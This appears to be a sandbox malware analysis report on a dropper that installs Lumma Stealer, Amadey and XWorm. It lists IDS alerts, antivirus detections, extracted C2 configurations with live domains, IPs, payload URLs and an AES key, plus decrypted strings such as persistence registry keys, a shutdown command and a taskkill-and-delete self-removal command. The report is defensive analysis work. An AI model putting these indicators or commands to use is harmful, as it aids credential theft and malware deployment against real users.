2025-03-04T09:56:46.199709+0100	2060529	1	Domain Observed Used for C2 Detected	192.168.2.7	49792	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gadgethgfub .icu in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:57:38.462714+0100	2060539	1	Domain Observed Used for C2 Detected	192.168.2.7	49981	188.114.96.3	443	TCP
2025-03-04T09:57:39.644314+0100	2060539	1	Domain Observed Used for C2 Detected	192.168.2.7	49983	188.114.96.3	443	TCP
2025-03-04T09:57:45.070855+0100	2060539	1	Domain Observed Used for C2 Detected	192.168.2.7	49985	188.114.96.3	443	TCP
2025-03-04T09:57:46.402437+0100	2060539	1	Domain Observed Used for C2 Detected	192.168.2.7	49986	188.114.96.3	443	TCP
2025-03-04T09:58:07.354496+0100	2060539	1	Domain Observed Used for C2 Detected	192.168.2.7	49994	188.114.96.3	443	TCP
2025-03-04T09:58:09.705308+0100	2060539	1	Domain Observed Used for C2 Detected	192.168.2.7	49996	188.114.96.3	443	TCP
2025-03-04T09:58:13.319498+0100	2060539	1	Domain Observed Used for C2 Detected	192.168.2.7	50002	188.114.96.3	443	TCP
2025-03-04T09:58:16.469872+0100	2060539	1	Domain Observed Used for C2 Detected	192.168.2.7	50005	188.114.96.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (circujitstorm .bet)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:56:27.255984+0100	2060528	1	Domain Observed Used for C2 Detected	192.168.2.7	53448	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gadgethgfub .icu)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:57:37.961032+0100	2060538	1	Domain Observed Used for C2 Detected	192.168.2.7	62876	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:56:31.535188+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49702	188.114.97.3	443	TCP
2025-03-04T09:57:45.728509+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49985	188.114.96.3	443	TCP
2025-03-04T09:58:10.254600+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49997	104.21.67.123	443	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:57:29.119782+0100	2856147	1	A Network Trojan was detected	192.168.2.7	49978	176.113.115.6	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:57:33.837870+0100	2803305	3	Unknown Traffic	192.168.2.7	49980	176.113.115.7	80	TCP
2025-03-04T09:57:41.593705+0100	2803305	3	Unknown Traffic	192.168.2.7	49984	176.113.115.7	80	TCP
2025-03-04T09:57:52.355695+0100	2803305	3	Unknown Traffic	192.168.2.7	49988	176.113.115.7	80	TCP
2025-03-04T09:58:04.275299+0100	2803305	3	Unknown Traffic	192.168.2.7	49992	176.113.115.7	80	TCP
2025-03-04T09:58:10.388034+0100	2803305	3	Unknown Traffic	192.168.2.7	49998	176.113.115.7	80	TCP
2025-03-04T09:58:17.198097+0100	2803305	3	Unknown Traffic	192.168.2.7	50006	176.113.115.7	80	TCP
2025-03-04T09:58:24.032867+0100	2803305	3	Unknown Traffic	192.168.2.7	50012	176.113.115.7	80	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:58:47.450753+0100	2852870	1	Malware Command and Control Activity Detected	178.250.188.144	22635	192.168.2.7	50013	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:58:46.743698+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.7	50013	178.250.188.144	22635	TCP
2025-03-04T09:58:57.334080+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.7	50013	178.250.188.144	22635	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:58:47.450753+0100	2852874	1	Malware Command and Control Activity Detected	178.250.188.144	22635	192.168.2.7	50013	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-04T09:58:46.743698+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.7	50013	178.250.188.144	22635	TCP
2025-03-04T09:58:57.334080+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.7	50013	178.250.188.144	22635	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: S2W2ftXM2b.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://gadgethgfub.icu/G	Avira URL Cloud: Label: malware
Source: https://gadgethgfub.icu:443/api	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/p	Avira URL Cloud: Label: malware
Source: https://gadgethgfub.icu/?	Avira URL Cloud: Label: malware
Source: https://socialsscesforum.icu:443/api	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/5265591378/JqGBbm7.exe	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/apia	Avira URL Cloud: Label: malware
Source: https://socialsscesforum.icu/api	Avira URL Cloud: Label: malware
Source: https://gadgethgfub.icu:443/apiWdtPWdtP	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/apib	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet:443/apipic	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/api-J	Avira URL Cloud: Label: malware
Source: circujitstorm.bet	Avira URL Cloud: Label: malware
Source: https://gadgethgfub.icu/e	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/6686268934/3Mv6i65.exe	Avira URL Cloud: Label: malware
Source: http://176.113.115.6/Ni9kiput/index.php	Avira URL Cloud: Label: malware
Source: http://176.113.115.7/files/7868598855/zY9sqWs.exe	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/apis	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet:443/api8	Avira URL Cloud: Label: malware
Source: https://gadgethgfub.icu/rsTW	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet:443/apir3.default-release/key4.dbPK	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/api	Avira URL Cloud: Label: malware
Source: https://gadgethgfub.icu/apia	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet:443/api	Avira URL Cloud: Label: malware
Source: https://gadgethgfub.icu/	Avira URL Cloud: Label: malware
Source: https://circujitstorm.bet/apie:I	Avira URL Cloud: Label: malware
Source: https://gadgethgfub.icu/apiH	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\zY9sqWs[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JqGBbm7[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["circujitstorm.bet", "hardswarehub.today", "tracnquilforest.life", "hardrwarehaven.run", "seizedsentec.online", "codxefusion.top", "quietswtreams.life", "starrynsightsky.icu"], "Build id": "PsFKDg--pablo"}
Source: 00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["178.250.188.144"], "Port": 22635, "Aes key": "<123456789>", "SPL": "<Violet>", "Install file": "USB.exe"}
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\zY9sqWs[1].exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\JqGBbm7[1].exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\bPDDW9F[1].exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\khykuQw[1].exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\3Mv6i65[1].exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\d0HNrLB[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe	ReversingLabs: Detection: 68%
Source: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe	ReversingLabs: Detection: 21%
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	ReversingLabs: Detection: 52%

Multi AV Scanner detection for submitted file

Source: S2W2ftXM2b.exe	Virustotal: Detection: 69%			Perma Link
Source: S2W2ftXM2b.exe	ReversingLabs: Detection: 63%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000022.00000002.2463770146.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 178.250.188.144
Source: 00000022.00000002.2463770146.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 22635
Source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String decryptor: circujitstorm.bet
Source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String decryptor: hardswarehub.today
Source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String decryptor: tracnquilforest.life
Source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String decryptor: hardrwarehaven.run
Source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String decryptor: seizedsentec.online
Source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String decryptor: codxefusion.top
Source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String decryptor: quietswtreams.life
Source: 00000008.00000002.1526029080.0000000000821000.00000040.00000001.01000000.00000009.sdmp	String decryptor: starrynsightsky.icu
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: 176.113.115.6
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: /Ni9kiput/index.php
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: S-%lu-
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: bb556cff4a
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: rapes.exe
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Startup
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: rundll32
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Programs
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: %USERPROFILE%
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: cred.dll
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: clip.dll
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: http://
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: https://
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: /quiet
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: /Plugins/
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: &unit=
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: shell32.dll
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: kernel32.dll
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: GetNativeSystemInfo
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: ProgramData\
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: AVAST Software
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Kaspersky Lab
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Panda Security
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Doctor Web
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: 360TotalSecurity
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Bitdefender
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Norton
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Sophos
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Comodo
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: WinDefender
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: 0123456789
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: ------
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: ?scr=1
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: ComputerName
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: -unicode-
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: VideoID
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: DefaultSettings.XResolution
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: DefaultSettings.YResolution
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: ProductName
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: CurrentBuild
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: rundll32.exe
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: "taskkill /f /im "
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: " && timeout 1 && del
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: && Exit"
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: " && ren
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Powershell.exe
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: shutdown -s -t 0
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: random
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: Keyboard Layout\Preload
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: 00000419
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: 00000422
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: 00000423
Source: 0000000D.00000002.1583019755.0000000000441000.00000040.00000001.01000000.0000000B.sdmp	String decryptor: 0000043f

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Code function: 0_2_00CF2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,		0_2_00CF2F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Code function: 8_2_0083BFAA CryptUnprotectData,		8_2_0083BFAA

Source: S2W2ftXM2b.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49986 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49990 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:49997 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:50011 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.123:443 -> 192.168.2.7:50014 version: TLS 1.2

Source: S2W2ftXM2b.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\python312.pdb source: 3Mv6i65.exe, 00000015.00000002.2669480863.00007FFB0C141000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: wextract.pdb source: S2W2ftXM2b.exe
Source:	Binary string: Advance.pdb source: d0HNrLB.exe, 00000019.00000000.2413994980.0000000000512000.00000002.00000001.01000000.0000001D.sdmp, d0HNrLB.exe, 00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp, d0HNrLB[1].exe.15.dr, WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: 3Mv6i65.exe, 00000014.00000003.2118072122.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wextract.pdbGCTL source: S2W2ftXM2b.exe
Source:	Binary string: System.ni.pdbRSDS source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.20.dr
Source:	Binary string: Advance.pdbhe source: d0HNrLB.exe, 00000019.00000000.2413994980.0000000000512000.00000002.00000001.01000000.0000001D.sdmp, d0HNrLB.exe, 00000021.00000002.2562200022.0000000003509000.00000004.00000800.00020000.00000000.sdmp, d0HNrLB[1].exe.15.dr
Source:	Binary string: System.pdb) source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: 3Mv6i65.exe, 00000014.00000003.2101104531.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2865428188.00007FFB23B23000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: 3Mv6i65.exe, 00000014.00000003.2101104531.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2865428188.00007FFB23B23000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: mscorlib.pdbSystem.Windows.Forms.dll< source: WERDA3F.tmp.dmp.36.dr
Source:	Binary string: System.pdb source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: Advance.pdbMZ source: WERCCA3.tmp.dmp.29.dr
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: 3Mv6i65.exe, 00000014.00000003.2101423522.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2790258052.00007FFB22785000.00000002.00000001.01000000.00000017.sdmp, VCRUNTIME140_1.dll.20.dr
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: 3Mv6i65.exe, 00000014.00000003.2117189834.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2765893657.00007FFB226A3000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: 3Mv6i65.exe, 00000015.00000002.2850728722.00007FFB23B01000.00000002.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: 3Mv6i65.exe, 00000014.00000003.2102651912.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.20.dr
Source:	Binary string: mscorlib.pdb source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: 3Mv6i65.exe, 00000014.00000003.2103031744.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2802608168.00007FFB23A4C000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERCCA3.tmp.dmp.29.dr, WERDA3F.tmp.dmp.36.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: 3Mv6i65.exe, 00000014.00000003.2103031744.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2802608168.00007FFB23A4C000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: 3Mv6i65.exe, 00000014.00000003.2101706876.0000025DDB9AE000.00000004.00000020.00020000.00000000.sdmp, 3Mv6i65.exe, 00000015.00000002.2816902176.00007FFB23A6E000.00000002.00000001.01000000.00000014.sdmp
